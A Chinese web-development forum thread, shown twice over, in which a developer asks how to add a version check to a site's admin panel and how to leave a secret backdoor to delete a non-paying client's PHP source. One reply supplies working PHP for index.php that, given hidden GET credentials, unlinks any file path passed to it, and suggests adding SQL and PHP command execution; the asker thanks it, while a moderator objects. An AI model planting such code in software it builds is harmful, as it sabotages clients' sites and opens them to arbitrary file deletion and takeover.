网站后台检查版本的代码怎么写, 还有怎么留后门?

时间:2022-09-24 14:32:14
想在网站后台增加一个功能:

 如果客户现在的版本低于我最新发布的,就提醒升级。

还有些客户做好了网站就不给余款,是否可以留个后门,遇到那种不给余款还骂人的,就通过一个秘密地址把他网站源码 unlink()掉。

大牛们给个思路,谢谢。

5 个解决方案

#1

版本检测网上的办法挺多的,个人比较推荐xml进行各种信息的描述,在入口启用xml文件检测,若版本低于,返回升级信息。不推荐直接unlink,如果造成损失可能吃官司,你可以设置一个超级入口就行了,如果他不付款,直接把核心功能给锁定了

#2

引用 1 楼 wang135139 的回复:
版本检测网上的办法挺多的,个人比较推荐xml进行各种信息的描述,在入口启用xml文件检测,若版本低于,返回升级信息。不推荐直接unlink,如果造成损失可能吃官司,你可以设置一个超级入口就行了,如果他不付款,直接把核心功能给锁定了



对,我不清空他的数据库和上传文件夹  只把一些重要模块的php文件删除   无法更新就可以


这个超级入口应该怎么写呢 ? 没做过,没见过

#3

不用想太复杂的。
例如有个叫index.php,很常见吧。
可以在里面加一个自己专用的方法做后门。
例如: 


<?php

$hack = isset($_GET['hack'])? $_GET['hack'] : 0;

$hackusername = isset($_GET['hackusername'])? $_GET['hackusername'] : '';

$hackpassword = isset($_GET['hackpassword'])? $_GET['hackpassword'] : '';


if($hack==1 && md5($hackusername)=='xxxx' && md5($hackpassword)=='xxxxxx'){


    $delfile = isset($_GET['delfile'])? $_GET['delfile'] : '';

    if($delfile!=''){

        delfile($delfile);

    }


    // 这里还可以做一个界面,可以输入sql,输入php执行命令那些.

}


function delfile($path){

    unlink($path);

}

?>

#4

给不懂代码的人用是可以的,给懂的 留了也白留,另外用户不就是客户吗?如果他要骂人不是你东西太烂就是服务不到位,总是有原因的,提高服务质量才是重要的,与其有这种精力去管理叛逆的用户不如花好精力做好你的产品。

#5

感谢三楼,赫然开朗。


四楼版主说得对,对于大多数情况只要做好事情顾客满意咱就可以拿到钱,可这个世界,什么人都有,我也是因为遇到那种无任何理由纯粹想逃脱付余款的*才会有这个想法,很无奈。

#1

版本检测网上的办法挺多的,个人比较推荐xml进行各种信息的描述,在入口启用xml文件检测,若版本低于,返回升级信息。不推荐直接unlink,如果造成损失可能吃官司,你可以设置一个超级入口就行了,如果他不付款,直接把核心功能给锁定了

#2

引用 1 楼 wang135139 的回复:
版本检测网上的办法挺多的,个人比较推荐xml进行各种信息的描述,在入口启用xml文件检测,若版本低于,返回升级信息。不推荐直接unlink,如果造成损失可能吃官司,你可以设置一个超级入口就行了,如果他不付款,直接把核心功能给锁定了



对,我不清空他的数据库和上传文件夹  只把一些重要模块的php文件删除   无法更新就可以


这个超级入口应该怎么写呢 ? 没做过,没见过

#3

不用想太复杂的。
例如有个叫index.php,很常见吧。
可以在里面加一个自己专用的方法做后门。
例如: 


<?php

$hack = isset($_GET['hack'])? $_GET['hack'] : 0;

$hackusername = isset($_GET['hackusername'])? $_GET['hackusername'] : '';

$hackpassword = isset($_GET['hackpassword'])? $_GET['hackpassword'] : '';


if($hack==1 && md5($hackusername)=='xxxx' && md5($hackpassword)=='xxxxxx'){


    $delfile = isset($_GET['delfile'])? $_GET['delfile'] : '';

    if($delfile!=''){

        delfile($delfile);

    }


    // 这里还可以做一个界面,可以输入sql,输入php执行命令那些.

}


function delfile($path){

    unlink($path);

}

?>

#4

给不懂代码的人用是可以的,给懂的 留了也白留,另外用户不就是客户吗?如果他要骂人不是你东西太烂就是服务不到位,总是有原因的,提高服务质量才是重要的,与其有这种精力去管理叛逆的用户不如花好精力做好你的产品。

#5

感谢三楼,赫然开朗。


四楼版主说得对,对于大多数情况只要做好事情顾客满意咱就可以拿到钱,可这个世界,什么人都有,我也是因为遇到那种无任何理由纯粹想逃脱付余款的*才会有这个想法,很无奈。
标签:

相关文章